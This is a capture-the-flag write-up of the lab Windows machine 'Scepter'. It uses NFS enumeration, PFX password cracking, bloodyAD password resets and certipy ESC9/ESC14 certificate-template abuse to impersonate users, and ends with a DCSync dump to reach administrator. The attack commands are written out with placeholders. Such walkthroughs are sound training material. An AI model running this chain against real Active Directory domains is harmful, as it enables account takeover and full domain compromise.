# Scepter

# 1. Enumeration

Start by enumerating open ports, since this is a Windows machine, several Microsoft Network services running on it

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image.png)

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%201.png)

Port 2049/tcp is particularly interesting, nmap identifies it as nlockmgr (Network Lock Manager), a protocol that cooperates with Network File System (NFS) to prevent issues caused by simultaneous writing

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%202.png)

Enumerate the current mount points in this host

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%203.png)

`-a active mounts` 

 `-e available exports`

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%204.png)

# 2. User flag

Download available files from the mount

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%205.png)

We have three .pfx files that we could try to crack in order to retrieve their pfx passwords and  generate new unprotected pfx files for domain authentication, but this will not work because those credentials have been revoked. Instead we could use one of these file to generate a hash to discover that a password was reused several times across all .pfx file. Then we can proceed to work with baker user, since we own needed files to create our own .pfx file and the password used for him is the same used for other users.

Another approach is using `pem2john` tool with the `baker.key` file

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%206.png)

To carry out the previously mentioned actions, start using `pfx2john` to generate a hash

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%207.png)

Upon inspecting that hash, we found that the generated type was `pfxng`

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%208.png)

You might encounter issues when cracking this hash because this format is not supported in some versions of john (at least not supported by the version included with kali), you can install a different version if you want,  although this could generate issues and might be problematic for your environment

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%209.png)

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2010.png)

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2011.png)

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2012.png)

  The recommended tool to address this scenario is `crackpkcs12` that cracks `p12` and `pfx` files

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/99591778-a1d7-4d1d-a2aa-1fbff0d78c0a.png)

Once the password is found, we can obtain a `pxf` file in name of `baker`

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2013.png)

Use that file to request a tgt using auth module in certipy

```python
certipy auth -pfx .pfx
```

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2014.png)

Set `/etc/resolv.conf` to avoid potential DNS problems while running the bloodhound collector

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2015.png)

```python
bloodhound-python -u d.baker --hashes :hash -ns dns -d domain -c ALL
```

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2016.png)

Checking the information displayed by Bloodhound we discovered that `p.adams` has `DCSync` privileges. Additionally, the account operators group has `generic all` privileges over him, and he is also associated with a  `helpdesk enrrollment certificate` , for that reason, he will be our final target account in order to compromise administrator account

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2017.png)

But for now we need to obtain the user flag first. Mark `d.baker` as owned, and identify the `ForceChangePassword` policy that he has over `a.carter`

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2018.png)

Abuse this configuration using

```python
bloodyAD --host dc01.domain.htb -d domain.htb -u atacker -p :hash set password victim newpassword
```

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2019.png)

`A.carter` is member of `IT support` group which holds `GenericAll` privileges over the `staff access certificate`

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2020.png)

It is curious that this template contains `d.baker` ; this might be vulnerable to some `ESC` technique due to a clear misconfiguration

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2021.png)

Let’s go through this step by step. First, let’s try to obtain all possible privileges over the users the have owned

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2022.png)

Find `ESC` type vulnerabilities using `certipy` tool

```python
certipy find -u d.baker -p 'hash' -dc-ip ip
```

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2023.png)

It says that d.baker might be vulnerable to `ESC9` but to perform this attack we need to be able to include the `UPN` in the `SAN` of the target user, and this configuration is not present, we only can include email in the `SAN` . Even so, now we are aware that this certification template has no security extension flag. We can also notice that this certificate template has `SubjectAltRequireEmail` set as a valid name option

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2024.png)

Then, use the following command to discover that the `altSecurityIdentity` property is used to identify `hbrowm` user. 

```python
 netexec ldap scepter.htb -u d.baker -H 18b5fb0d99e7a475316213c15b6f22ce --query "(sAMAccountName=h.brown)" ""
```

This property is related with ESC14 and we are going to see a lot of it on this machine

You can see more information about it here:

https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2025.png)

With all the information gathered so far, we can perform an attack to escalate to h.brown user

```python
bloodyAD --host dc01.domain.htb -d domain.htb -u a.carter -p 'password' set object 'user-owned' mail -v 'target@mail.htb'
certipy req -ca CA -u 'user-owned' -hashes :hash -template vulnerabletemplate -target dc01.scepter.htb
certipy auth -domain domain.htb -pfx .pfx -dc-ip ip -username 'target'
```

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2026.png)

Set the `/etc/krb5.conf`

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2027.png)

Use the obtained hash to get a TGT and get remote access as h.brown

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/7e673afa-a3cb-4d7e-a84e-f9e1afe1d10f.png)

# 3.Priv esc

Check write permissions for `h.brown` user

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2028.png)

Write permissions in `altSecurityIdentities` property over `p.adams` open up another potential attack ESC14 vector mixed with the previous scenario exploited

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2029.png)

Basically we are going to set an weak X509RFC822 explicit mapping in `altSecurityIdentities` using scenario A (Write permissions) to then perform the previous attack using scenario B

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2030.png)

Use the following commands to spoof `p.adams` 

```python
#Set property in p.adams 
bloodyAD --host dc01.domain.htb -d domain.htb -u attacker1 -k set object 'victim' altSecurityIdentities -v 'x509:<RFC822>p.adams@scepter.htb'
#Make h.brown use p.adams email
bloodyAD --host dc01.domain.htb -d domain.htb -u attacker2 -p 'password' set object 'attacker1' mail -v 'target@domain.htb'
```

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2031.png)

```python
#Request a .pfx fila as p.adams using d.baker ticket
certipy req -ca CA -u 'user-owned' -k -template vulnerabletemplate -target dc01.scepter.htb -out p.adams
```

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2032.png)

```python
#Authenticate and the nt hash for p.adams
certipy auth -domain domain.htb -pfx .pfx -dc-ip ip -username 'target'
```

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2033.png)

As `p.adams` has DCSync privileges, proceed to dump secrets to then access as administrator

![image.png](Scepter%2021cb9525529180f9923ac1ccec164888/image%2034.png)

Machine pwned@@@##!